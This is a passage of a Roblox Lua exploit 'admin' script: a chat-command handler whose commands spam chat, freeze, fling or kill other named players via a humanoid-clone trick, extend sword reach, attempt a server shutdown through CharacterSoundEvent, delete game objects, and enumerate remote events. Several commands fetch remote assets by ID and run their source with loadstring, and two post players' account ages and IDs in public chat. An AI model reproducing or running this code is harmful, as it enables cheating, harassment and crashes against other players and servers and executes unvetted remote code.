  1249.         game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer((string.sub(msg, 7)), "All")
  1250.     end
  1251.     if string.sub(msg, 1, 6) == (prefix.."spam ") then
  1252.         spamtext = (string.sub(msg, 7))
  1253.         spamming = true
  1254.     end
  1255.     if string.sub(msg, 1, 7) == (prefix.."unspam") then
  1256.         spamming = false
  1257.     end
  1258.     if string.sub(msg, 1, 10) == (prefix.."spamwait ") then
  1259.         spamdelay = (string.sub(msg, 11))
  1260.     end
  1261.     if string.sub(msg, 1, 8) == (prefix.."pmspam ") then
  1262.         for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  1263.             pmspammed = v.Name
  1264.             spammingpm = true
  1265.         end
  1266.     end
  1267.     if string.sub(msg, 1, 9) == (prefix.."unpmspam") then
  1268.         spammingpm = false
  1269.     end
  1270.     if string.sub(msg, 1, 9) == (prefix.."cfreeze ") then
  1271.         for i,v in pairs(GetPlayer(string.sub(msg, 10))) do
  1272.             v.Character["Left Leg"].Anchored = true
  1273.             v.Character["Left Arm"].Anchored = true
  1274.             v.Character["Right Leg"].Anchored = true
  1275.             v.Character["Right Arm"].Anchored = true
  1276.             v.Character.Torso.Anchored = true
  1277.             v.Character.Head.Anchored = true
  1278.         end
  1279.     end
  1280.     if string.sub(msg, 1, 11) == (prefix.."uncfreeze ") then
  1281.         for i,v in pairs(GetPlayer(string.sub(msg, 12))) do
  1282.             v.Character["Left Leg"].Anchored = false
  1283.             v.Character["Left Arm"].Anchored = false
  1284.             v.Character["Right Leg"].Anchored = false
  1285.             v.Character["Right Arm"].Anchored = false
  1286.             v.Character.Torso.Anchored = false
  1287.             v.Character.Head.Anchored = false
  1288.         end
  1289.     end
  1290.     if string.sub(msg, 1, 9) == (prefix.."unlockws") then
  1291.         local a = game:GetService("Workspace"):getChildren()
  1292.         for i = 1, #a do
  1293.             if a[i].className == "Part" then
  1294.                 a[i].Locked = false
  1295.             elseif a[i].className == "Model" then
  1296.                 local r = a[i]:getChildren()
  1297.                 for i = 1, #r do
  1298.                     if r[i].className == "Part" then
  1299.                     r[i].Locked = false
  1300.                     end
  1301.                 end
  1302.             end
  1303.         end
  1304.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1305.         Title = "Success!";
  1306.         Text = "Workspace unlocked. Use ;lockws to lock.";
  1307.         })
  1308.     end
  1309.     if string.sub(msg, 1, 7) == (prefix.."lockws") then
  1310.         local a = game:GetService("Workspace"):getChildren()
  1311.         for i = 1, #a do
  1312.             if a[i].className == "Part" then
  1313.                 a[i].Locked = true
  1314.             elseif a[i].className == "Model" then
  1315.                 local r = a[i]:getChildren()
  1316.                 for i = 1, #r do
  1317.                     if r[i].className == "Part" then
  1318.                     r[i].Locked = true
  1319.                     end
  1320.                 end
  1321.             end
  1322.         end
  1323.     end
  1324.     if string.sub(msg, 1, 7) == (prefix.."btools") then
  1325.         local Clone_T = Instance.new("HopperBin",lplayer.Backpack)
  1326.         Clone_T.BinType = "Clone"
  1327.         local Destruct = Instance.new("HopperBin",lplayer.Backpack)
  1328.         Destruct.BinType = "Hammer"
  1329.         local Hold_T = Instance.new("HopperBin",lplayer.Backpack)
  1330.         Hold_T.BinType = "Grab"
  1331.     end
  1332.     if string.sub(msg, 1, 7) == (prefix.."pstand") then
  1333.         lplayer.Character.Humanoid.PlatformStand = true
  1334.     end
  1335.     if string.sub(msg, 1, 9) == (prefix.."unpstand") then
  1336.         lplayer.Character.Humanoid.PlatformStand = false
  1337.     end
  1338.     if string.sub(msg, 1, 10) == (prefix.."blockhead") then
  1339.         lplayer.Character.Head.Mesh:Destroy()
  1340.     end
  1341.     if string.sub(msg, 1, 4) == (prefix.."sit") then
  1342.         lplayer.Character.Humanoid.Sit = true
  1343.     end
  1344.     if string.sub(msg, 1, 10) == (prefix.."bringobj ") then
  1345.         local function bringobjw()
  1346.         for i,obj in ipairs(game:GetService("Workspace"):GetDescendants()) do
  1347.         if obj.Name == (string.sub(msg, 11)) then
  1348.         obj.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  1349.         obj.CanCollide = false
  1350.         obj.Transparency = 0.7
  1351.         wait()
  1352.         obj.CFrame = lplayer.Character["Left Leg"].CFrame
  1353.         wait()
  1354.         obj.CFrame = lplayer.Character["Right Leg"].CFrame
  1355.         wait()
  1356.         obj.CFrame = lplayer.Character["Head"].CFrame
  1357.         end
  1358.         end
  1359.         end
  1360.         while wait() do
  1361.             bringobjw()
  1362.         end
  1363.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1364.         Title = "BringObj";
  1365.         Text = "BringObj enabled.";
  1366.         })
  1367.     end
  1368.     if string.sub(msg, 1, 7) == (prefix.."wsvis ") then
  1369.         vis = (string.sub(msg, 8))
  1370.         local a = game:GetService("Workspace"):GetDescendants()
  1371.         for i = 1, #a do
  1372.             if a[i].className == "Part" then
  1373.                 a[i].Transparency = vis
  1374.             elseif a[i].className == "Model" then
  1375.                 local r = a[i]:getChildren()
  1376.                 for i = 1, #r do
  1377.                     if r[i].className == "Part" then
  1378.                     r[i].Transparency = vis
  1379.                     end
  1380.                 end
  1381.             end
  1382.         end
  1383.     end
  1384.     if string.sub(msg, 1, 11) == (prefix.."hypertotal") then
  1385.         loadstring(game:GetObjects("rbxassetid://1255063809")[1].Source)()
  1386.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1387.         Title = "Success!";
  1388.         Text = "HyperTotal GUI Loaded!";
  1389.         })
  1390.     end
  1391.     if string.sub(msg, 1, 5) == (prefix.."cmds") then
  1392.         CMDSFRAME.Visible = true
  1393.     end
  1394.     if string.sub(msg, 1, 10) == (prefix.."rmeshhats") then
  1395.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1396.             if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  1397.                 v.Handle.Mesh:Destroy()
  1398.             end
  1399.         end
  1400.     end
  1401.     if string.sub(msg, 1, 10) == (prefix.."blockhats") then
  1402.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1403.             if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  1404.                 v.Handle.Mesh:Destroy()
  1405.             end
  1406.         end
  1407.     end
  1408.     if string.sub(msg, 1, 10) == (prefix.."rmeshtool") then
  1409.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1410.             if (v:IsA("Tool")) then
  1411.                 v.Handle.Mesh:Destroy()
  1412.             end
  1413.         end
  1414.     end
  1415.     if string.sub(msg, 1, 10) == (prefix.."blocktool") then
  1416.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1417.             if (v:IsA("Tool")) then
  1418.                 v.Handle.Mesh:Destroy()
  1419.             end
  1420.         end
  1421.     end
  1422.     if string.sub(msg, 1, 8) == (prefix.."spinner") then
  1423.         local p = Instance.new("RocketPropulsion")
  1424.         p.Parent = lplayer.Character.HumanoidRootPart
  1425.         p.Name = "Spinner"
  1426.         p.Target = lplayer.Character["Left Arm"]
  1427.         p:Fire()
  1428.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1429.         Title = "Spinner enabled";
  1430.         Text = "Type ;nospinner to disable.";
  1431.         })
  1432.     end
  1433.     if string.sub(msg, 1, 10) == (prefix.."nospinner") then
  1434.         lplayer.Character.HumanoidRootPart.Spinner:Destroy()
  1435.     end
  1436.     if string.sub(msg, 1, 7) == (prefix.."reachd") then
  1437.         for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  1438.             if v:isA("Tool") then
  1439.                 local a = Instance.new("SelectionBox",v.Handle)
  1440.                 a.Adornee = v.Handle
  1441.                 v.Handle.Size = Vector3.new(0.5,0.5,60)
  1442.                 v.GripPos = Vector3.new(0,0,0)
  1443.                 lplayer.Character.Humanoid:UnequipTools()
  1444.             end
  1445.         end
  1446.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1447.         Title = "Reach applied!";
  1448.         Text = "Applied to equipped sword. Use ;noreach to disable.";
  1449.         })
  1450.     end
  1451.     if string.sub(msg, 1, 7) == (prefix.."reach ") then
  1452.         for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  1453.             if v:isA("Tool") then
  1454.                 handleSize = v.Handle.Size
  1455.                 wait()
  1456.                 local a = Instance.new("SelectionBox",v.Handle)
  1457.                 a.Name = "a"
  1458.                 a.Adornee = v.Handle
  1459.                 v.Handle.Size = Vector3.new(0.5,0.5,(string.sub(msg, 8)))
  1460.                 v.GripPos = Vector3.new(0,0,0)
  1461.                 lplayer.Character.Humanoid:UnequipTools()
  1462.             end
  1463.         end
  1464.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1465.         Title = "Reach applied!";
  1466.         Text = "Applied to equipped sword. Use ;noreach to disable.";
  1467.         })
  1468.     end
  1469.     if string.sub(msg, 1, 8) == (prefix.."noreach") then
  1470.         for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  1471.             if v:isA("Tool") then
  1472.                 v.Handle.a:Destroy()
  1473.                 v.Handle.Size = handleSize
  1474.             end
  1475.         end
  1476.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1477.         Title = "Reach removed!";
  1478.         Text = "Removed reach from equipped sword.";
  1479.         })
  1480.     end
  1481.     if string.sub(msg, 1, 7) == (prefix.."rkill ") then
  1482.         for i,v in pairs(GetPlayer(string.sub(msg, 8)))do
  1483.             lplayer.Character.Humanoid.Name = 1
  1484.             local l = lplayer.Character["1"]:Clone()
  1485.             l.Parent = lplayer.Character
  1486.             l.Name = "Humanoid"
  1487.             wait(0.1)
  1488.             lplayer.Character["1"]:Destroy()
  1489.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  1490.             lplayer.Character.Animate.Disabled = true
  1491.             wait(0.1)
  1492.             lplayer.Character.Animate.Disabled = false
  1493.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  1494.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  1495.             lplayer.Character.Humanoid:EquipTool(v)
  1496.             end
  1497.             wait(0.1)
  1498.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1499.             wait(0.2)
  1500.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1501.             wait(0.5)
  1502.             lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,10,-100000))
  1503.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1504.             Title = "Tools needed!";
  1505.             Text = "You need a tool in your backpack for this command!";
  1506.             })
  1507.         end
  1508.     end
  1509.     if string.sub(msg, 1, 7) == (prefix.."tp me ") then
  1510.         for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  1511.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1512.         end
  1513.     end
  1514.     if string.sub(msg, 1, 8) == (prefix.."cbring ") then
  1515.         if (string.sub(msg, 9)) == "all" or (string.sub(msg, 9)) == "All" or (string.sub(msg, 9)) == "ALL" then
  1516.             cbringall = true
  1517.         else
  1518.             for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  1519.                 brplr = v.Name
  1520.             end
  1521.         end
  1522.         cbring = true
  1523.     end
  1524.     if string.sub(msg, 1, 9) == (prefix.."uncbring") then
  1525.         cbring = false
  1526.         cbringall = false
  1527.     end
  1528.     if string.sub(msg, 1, 6) == (prefix.."swap ") then
  1529.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  1530.             local NOWPLR = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1531.             local NOW = lplayer.Character.HumanoidRootPart.CFrame
  1532.             lplayer.Character.Humanoid.Name = 1
  1533.             local l = lplayer.Character["1"]:Clone()
  1534.             l.Parent = lplayer.Character
  1535.             l.Name = "Humanoid"
  1536.             wait(0.1)
  1537.             lplayer.Character["1"]:Destroy()
  1538.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  1539.             lplayer.Character.Animate.Disabled = true
  1540.             wait(0.1)
  1541.             lplayer.Character.Animate.Disabled = false
  1542.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  1543.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  1544.             lplayer.Character.Humanoid:EquipTool(v)
  1545.             end
  1546.             local function tp(player,player2)
  1547.             local char1,char2=player.Character,player2.Character
  1548.             if char1 and char2 then
  1549.             char1:MoveTo(char2.Head.Position)
  1550.             end
  1551.             end
  1552.             wait(0.1)
  1553.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1554.             wait(0.2)
  1555.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1556.             wait(0.5)
  1557.             lplayer.Character.HumanoidRootPart.CFrame = NOW
  1558.             wait(0.6)
  1559.             tp(lplayer, game:GetService("Players")[v.Name])
  1560.             wait(0.4)
  1561.             lplayer.Character.HumanoidRootPart.CFrame = NOWPLR
  1562.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1563.             Title = "Tools needed!";
  1564.             Text = "You need a tool in your backpack for this command!";
  1565.             })
  1566.         end
  1567.     end
  1568.     if string.sub(msg, 1, 8) == (prefix.."glitch ") then
  1569.         for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  1570.             lplayer.Character.Humanoid.Name = 1
  1571.             local l = lplayer.Character["1"]:Clone()
  1572.             l.Parent = lplayer.Character
  1573.             l.Name = "Humanoid"
  1574.             wait(0.1)
  1575.             lplayer.Character["1"]:Destroy()
  1576.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  1577.             lplayer.Character.Animate.Disabled = true
  1578.             wait(0.1)
  1579.             lplayer.Character.Animate.Disabled = false
  1580.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  1581.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  1582.             lplayer.Character.Humanoid:EquipTool(v)
  1583.             end
  1584.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  1585.             wait(0.3)
  1586.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  1587.             wait(0.4)
  1588.             b = Instance.new("BodyForce")
  1589.             b.Parent = lplayer.Character.HumanoidRootPart
  1590.             b.Name = "Glitch"
  1591.             b.Force = Vector3.new(100000000,5000,0)
  1592.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1593.             Title = "Tools needed!";
  1594.             Text = "You need a tool in your backpack for this command!";
  1595.             })
  1596.         end
  1597.     end
  1598.     if string.sub(msg, 1, 9) == (prefix.."unglitch") then
  1599.         lplayer.Character.HumanoidRootPart.Glitch:Destroy()
  1600.         lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(10000,0,10000)
  1601.         b = Instance.new("BodyForce")
  1602.         b.Parent = lplayer.Character.HumanoidRootPart
  1603.         b.Name = "unGlitch"
  1604.         b.Force = Vector3.new(0,-5000000,0)
  1605.         wait(2)
  1606.         lplayer.Character.HumanoidRootPart.unGlitch:Destroy()
  1607.     end
  1608.     if string.sub(msg, 1, 9) == (prefix.."grespawn") then
  1609.         lplayer.Character.Humanoid.Health = 0
  1610.         wait(1)
  1611.         lplayer.Character.Head.CFrame = CFrame.new(1000000,0,1000000)
  1612.         lplayer.Character.Torso.CFrame = CFrame.new(1000000,0,1000000)
  1613.     end
  1614.     if string.sub(msg, 1, 9) == (prefix.."explorer") then
  1615.         loadstring(game:GetObjects("rbxassetid://492005721")[1].Source)()
  1616.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1617.         Title = "Success!";
  1618.         Text = "DEX Explorer has loaded.";
  1619.         })
  1620.     end
  1621.     if string.sub(msg, 1, 6) == (prefix.."anim ") then
  1622.         local Anim = Instance.new("Animation")
  1623.         Anim.AnimationId = "rbxassetid://"..(string.sub(msg, 7))
  1624.         local track = lplayer.Character.Humanoid:LoadAnimation(Anim)
  1625.         track:Play(.1, 1, 1)
  1626.     end
  1627.     if string.sub(msg, 1, 8) == (prefix.."animgui") then
  1628.         loadstring(game:GetObjects("rbxassetid://1202558084")[1].Source)()
  1629.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1630.         Title = "Success!";
  1631.         Text = "Energize Animations GUI has loaded.";
  1632.         })
  1633.     end
  1634.     if string.sub(msg, 1, 8) == (prefix.."savepos") then
  1635.         saved = lplayer.Character.HumanoidRootPart.CFrame
  1636.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1637.         Title = "Position Saved";
  1638.         Text = "Use ;loadpos to return to saved position.";
  1639.         })
  1640.     end
  1641.     if string.sub(msg, 1, 8) == (prefix.."loadpos") then
  1642.         lplayer.Character.HumanoidRootPart.CFrame = saved
  1643.     end
  1644.     if string.sub(msg, 1, 6) == (prefix.."bang ") then
  1645.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  1646.             local Anim2 = Instance.new("Animation")
  1647.             Anim2.AnimationId = "rbxassetid://148840371"
  1648.             local track2 = lplayer.Character.Humanoid:LoadAnimation(Anim2)
  1649.             track2:Play(.1, 1, 1)
  1650.             bplrr = v.Name
  1651.             banpl = true
  1652.         end
  1653.     end
  1654.     if string.sub(msg, 1, 7) == (prefix.."unbang") then
  1655.         banpl = false
  1656.     end
  1657.     if string.sub(msg, 1, 10) == (prefix.."bringmod ") then
  1658.         local function bringmodw()
  1659.         for i,obj in ipairs(game:GetService("Workspace"):GetDescendants()) do
  1660.         if obj.Name == (string.sub(msg, 11)) then
  1661.         for i,ch in pairs(obj:GetDescendants()) do
  1662.         if (ch:IsA("BasePart")) then
  1663.         ch.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  1664.         ch.CanCollide = false
  1665.         ch.Transparency = 0.7
  1666.         wait()
  1667.         ch.CFrame = lplayer.Character["Left Leg"].CFrame
  1668.         wait()
  1669.         ch.CFrame = lplayer.Character["Right Leg"].CFrame
  1670.         wait()
  1671.         ch.CFrame = lplayer.Character["Head"].CFrame
  1672.         end
  1673.         end
  1674.         end
  1675.         end
  1676.         end
  1677.         while wait() do
  1678.             bringmodw()
  1679.         end
  1680.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1681.         Title = "BringMod";
  1682.         Text = "BringMod enabled.";
  1683.         })
  1684.     end
  1685.     if string.sub(msg, 1, 8) == (prefix.."respawn") then
  1686.         local mod = Instance.new('Model', workspace) mod.Name = 're '..lplayer.Name
  1687.         local hum = Instance.new('Humanoid', mod)
  1688.         local ins = Instance.new('Part', mod) ins.Name = 'Torso' ins.CanCollide = false ins.Transparency = 1
  1689.         lplayer.Character = mod
  1690.     end
  1691.     if string.sub(msg, 1, 9) == (prefix.."shutdown") then
  1692.         game:GetService'RunService'.Stepped:Connect(function()
  1693.         pcall(function()
  1694.             for i,v in pairs(game:GetService'Players':GetPlayers()) do
  1695.                 if v.Character ~= nil and v.Character:FindFirstChild'Head' then
  1696.                     for _,x in pairs(v.Character.Head:GetChildren()) do
  1697.                         if x:IsA'Sound' then x.Playing = true x.CharacterSoundEvent:FireServer(true, true) end
  1698.                     end
  1699.                 end
  1700.             end
  1701.         end)
  1702.         end)
  1703.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1704.         Title = "Attempting Shutdown";
  1705.         Text = "Shutdown Attempt has begun.";
  1706.         })
  1707.     end
  1708.     if string.sub(msg, 1, 8) == (prefix.."delobj ") then
  1709.         objtodel = (string.sub(msg, 9))
  1710.         for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do
  1711.             if v.Name == objtodel then
  1712.                 v:Destroy()
  1713.             end
  1714.         end
  1715.     end
  1716.     if string.sub(msg, 1, 8) == (prefix.."getplrs") then
  1717.         for i,v in pairs(game:GetService("Players"):GetPlayers())do
  1718.             print(v)
  1719.         end
  1720.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1721.         Title = "Printed";
  1722.         Text = "Players have been printed to console. (F9)";
  1723.         })
  1724.     end
  1725.     if string.sub(msg, 1, 9) == (prefix.."deldecal") then
  1726.         for i,v in pairs(game:GetService("Workspace"):GetDescendants())do
  1727.             if (v:IsA("Decal")) then
  1728.                 v:Destroy()
  1729.             end
  1730.         end
  1731.     end
  1732.     if string.sub(msg, 1, 11) == (prefix.."opfinality") then
  1733.         loadstring(game:GetObjects("rbxassetid://1294358929")[1].Source)()
  1734.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1735.         Title = "Success!";
  1736.         Text = "OpFinality GUI has loaded.";
  1737.         })
  1738.     end
  1739.     if string.sub(msg, 1, 8) == (prefix.."remotes") then
  1740.         remotes = true
  1741.         added = true
  1742.         game.DescendantAdded:connect(function(rmt)
  1743.         if added == true then
  1744.         if remotes == true then
  1745.         if rmt:IsA("RemoteEvent") then
  1746.         print("A RemoteEvent was added!")
  1747.         print(" game." .. rmt:GetFullName() .. " | RemoteEvent")
  1748.         print(" game." .. rmt:GetFullName() .. " | RemoteEvent", 247, 0, 0, true)
  1749.         end end end
  1750.         end)
  1751.         game.DescendantAdded:connect(function(rmtfnctn)
  1752.         if added == true then
  1753.         if remotes == true then
  1754.         if rmtfnctn:IsA("RemoteFunction") then
  1755.         warn("A RemoteFunction was added!")
  1756.         warn(" game." .. rmtfnctn:GetFullName() .. " | RemoteFunction")
  1757.         print(" game." .. rmtfnctn:GetFullName() .. " | RemoteFunction", 5, 102, 198, true)
  1758.         end end end
  1759.         end)
  1760.        
  1761.         game.DescendantAdded:connect(function(bndfnctn)
  1762.         if added == true then
  1763.         if binds == true then
  1764.         if bndfnctn:IsA("BindableFunction") then
  1765.         print("A BindableFunction was added!")
  1766.         print(" game." .. bndfnctn:GetFullName() .. " | BindableFunction")
  1767.         print(" game." .. bndfnctn:GetFullName() .. " | BindableFunction", 239, 247, 4, true)
  1768.         end end end
  1769.         end)
  1770.        
  1771.         game.DescendantAdded:connect(function(bnd)
  1772.         if added == true then
  1773.         if binds == true then
  1774.         if bnd:IsA("BindableEvent") then
  1775.         warn("A BindableEvent was added!")
  1776.         warn(" game." .. bnd:GetFullName() .. " | BindableEvent")
  1777.         print(" game." .. bnd:GetFullName() .. " | BindableEvent", 13, 193, 22, true)
  1778.         end end end
  1779.         end)
  1780.        
  1781.        
  1782.         if binds == true then
  1783.         for i,v in pairs(game:GetDescendants()) do
  1784.         if v:IsA("BindableFunction") then
  1785.         print(" game." .. v:GetFullName() .. " | BindableFunction")
  1786.         print(" game." .. v:GetFullName() .. " | BindableFunction", 239, 247, 4, true)
  1787.         end end
  1788.         for i,v in pairs(game:GetDescendants()) do
  1789.         if v:IsA("BindableEvent") then
  1790.         warn(" game." .. v:GetFullName() .. " | BindableEvent")
  1791.         print(" game." .. v:GetFullName() .. " | BindableEvent", 13, 193, 22, true)
  1792.         end end
  1793.         else
  1794.         print("Off")
  1795.         end
  1796.         if remotes == true then
  1797.         for i,v in pairs(game:GetDescendants()) do
  1798.         if v:IsA("RemoteFunction") then
  1799.         warn(" game." .. v:GetFullName() .. " | RemoteFunction")
  1800.         print(" game." .. v:GetFullName() .. " | RemoteFunction", 5, 102, 198, true)
  1801.         end end
  1802.         wait()
  1803.         for i,v in pairs(game:GetDescendants()) do
  1804.         if v:IsA("RemoteEvent") then
  1805.         print(" game." .. v:GetFullName() .. " | RemoteEvent")
  1806.         print(" game." .. v:GetFullName() .. " | RemoteEvent", 247, 0, 0, true)
  1807.         end end
  1808.         else
  1809.         print("Off")
  1810.         end
  1811.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1812.         Title = "Printing Remotes";
  1813.         Text = "Type ;noremotes to disable.";
  1814.         })
  1815.     end
  1816.     if string.sub(msg, 1, 10) == (prefix.."noremotes") then
  1817.         remotes = false
  1818.         added = false
  1819.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1820.         Title = "Printing Remotes Disabled";
  1821.         Text = "Type ;remotes to enable.";
  1822.         })
  1823.     end
  1824.     if string.sub(msg, 1, 10) == (prefix.."tpdefault") then
  1825.         spin = false
  1826.         followed = false
  1827.         traill = false
  1828.         noclip = false
  1829.         annoying = false
  1830.         hwalk = false
  1831.         cbringing = false
  1832.     end
  1833.     if string.sub(msg, 1, 8) == (prefix.."stopsit") then
  1834.         stopsitting = true
  1835.     end
  1836.     if string.sub(msg, 1, 6) == (prefix.."gosit") then
  1837.         stopsitting = false
  1838.     end
  1839.     if string.sub(msg, 1, 8) == (prefix.."version") then
  1840.         print(adminversion)
  1841.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1842.         Title = "Version";
  1843.         Text = adminversion;
  1844.         })
  1845.     end
  1846.     if string.sub(msg, 1, 8) == (prefix.."clicktp") then
  1847.         clickgoto = true
  1848.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1849.         Title = "Click TP";
  1850.         Text = "Press E to teleport to mouse position, ;noclicktp to stop";
  1851.         })
  1852.     end
  1853.     if string.sub(msg, 1, 9) == (prefix.."clickdel") then
  1854.         clickdel = true
  1855.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1856.         Title = "Click Delete";
  1857.         Text = "Press E to delete part at mouse, ;noclickdel to stop";
  1858.         })
  1859.     end
  1860.     if string.sub(msg, 1, 11) == (prefix.."noclickdel") then
  1861.         clickdel = false
  1862.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1863.         Title = "Click Delete";
  1864.         Text = "Click delete has been disabled.";
  1865.         })
  1866.     end
  1867.     if string.sub(msg, 1, 10) == (prefix.."noclicktp") then
  1868.         clickgoto = false
  1869.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1870.         Title = "Click TP";
  1871.         Text = "Click TP has been disabled.";
  1872.         })
  1873.     end
  1874.     if string.sub(msg, 1, 8) == (prefix.."toolson") then
  1875.         gettingtools = true
  1876.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1877.         Title = "Tools Enabled";
  1878.         Text = "Automatically colleting tools dropped.";
  1879.         })
  1880.     end
  1881.     if string.sub(msg, 1, 9) == (prefix.."toolsoff") then
  1882.         gettingtools = false
  1883.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1884.         Title = "Tools Disabled";
  1885.         Text = "Click TP has been disabled.";
  1886.         })
  1887.     end
  1888.     if string.sub(msg, 1, 10) == (prefix.."delcmdbar") then
  1889.         ScreenGui:Destroy()
  1890.     end
  1891.     if string.sub(msg, 1, 6) == (prefix.."reset") then
  1892.         lplayer.Character.Head:Destroy()
  1893.     end
  1894.     if string.sub(msg, 1, 7) == (prefix.."state ") then
  1895.         statechosen = string.sub(msg, 8)
  1896.         changingstate = true
  1897.     end
  1898.     if string.sub(msg, 1, 9) == (prefix.."gravity ") then
  1899.         game:GetService("Workspace").Gravity = string.sub(msg, 10)
  1900.     end
  1901.     if string.sub(msg, 1, 10) == (prefix.."looprhats") then
  1902.         removingmeshhats = true
  1903.     end
  1904.     if string.sub(msg, 1, 12) == (prefix.."unlooprhats") then
  1905.         removingmeshhats = false
  1906.     end
  1907.     if string.sub(msg, 1, 10) == (prefix.."looprtool") then
  1908.         removingmeshtool = true
  1909.     end
  1910.     if string.sub(msg, 1, 12) == (prefix.."unlooprtool") then
  1911.         removingmeshtool = false
  1912.     end
  1913.     if string.sub(msg, 1, 10) == (prefix.."givetool ") then
  1914.         for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  1915.             if v:IsA("Tool") then
  1916.                 for i,player in pairs(GetPlayer(string.sub(msg, 11))) do
  1917.                     v.Parent = player.Character
  1918.                 end
  1919.             end
  1920.         end
  1921.     end
  1922.     if string.sub(msg, 1, 14) == (prefix.."givealltools ") then
  1923.         for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetDescendants()) do
  1924.             if v:IsA("Tool") then
  1925.                 v.Parent = lplayer.Character
  1926.                 wait()
  1927.                 for i,player in pairs(GetPlayer(string.sub(msg, 15))) do
  1928.                     v.Parent = player.Character
  1929.                 end
  1930.             end
  1931.         end
  1932.     end
  1933.     if string.sub(msg, 1, 5) == (prefix.."age ") then
  1934.         for i,player in pairs(GetPlayer(string.sub(msg, 6))) do
  1935.             game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(player.Name.." Account Age: "..player.AccountAge.." days!", "All")
  1936.         end
  1937.     end
  1938.     if string.sub(msg, 1, 4) == (prefix.."id ") then
  1939.         for i,player in pairs(GetPlayer(string.sub(msg, 5))) do
  1940.             game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(player.Name.." Account ID: "..player.UserId, "All")
  1941.         end
  1942.     end
  1943.     if string.sub(msg, 1, 6) == (prefix..".age ") then
  1944.         for i,player in pairs(GetPlayer(string.sub(msg, 7))) do
  1945.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1946.             Title = player.AccountAge.." Days";
  1947.             Text = "Account age of "..player.Name;
  1948.             })
  1949.         end
  1950.     end
  1951.     if string.sub(msg, 1, 5) == (prefix..".id ") then
  1952.         for i,player in pairs(GetPlayer(string.sub(msg, 6))) do
  1953.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1954.             Title = player.UserId.." ID";
  1955.             Text = "Account ID of "..player.Name;
  1956.             })
  1957.         end
  1958.     end
  1959.     if string.sub(msg, 1, 7) == (prefix.."gameid") then
  1960.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1961.         Title = "Game ID";
  1962.         Text = "Game ID: ".. game.GameId;
  1963.         })
  1964.     end
  1965.     if string.sub(msg, 1, 4) == (prefix.."pgs") then
  1966.         local pgscheck = game:GetService("Workspace"):PGSIsEnabled()
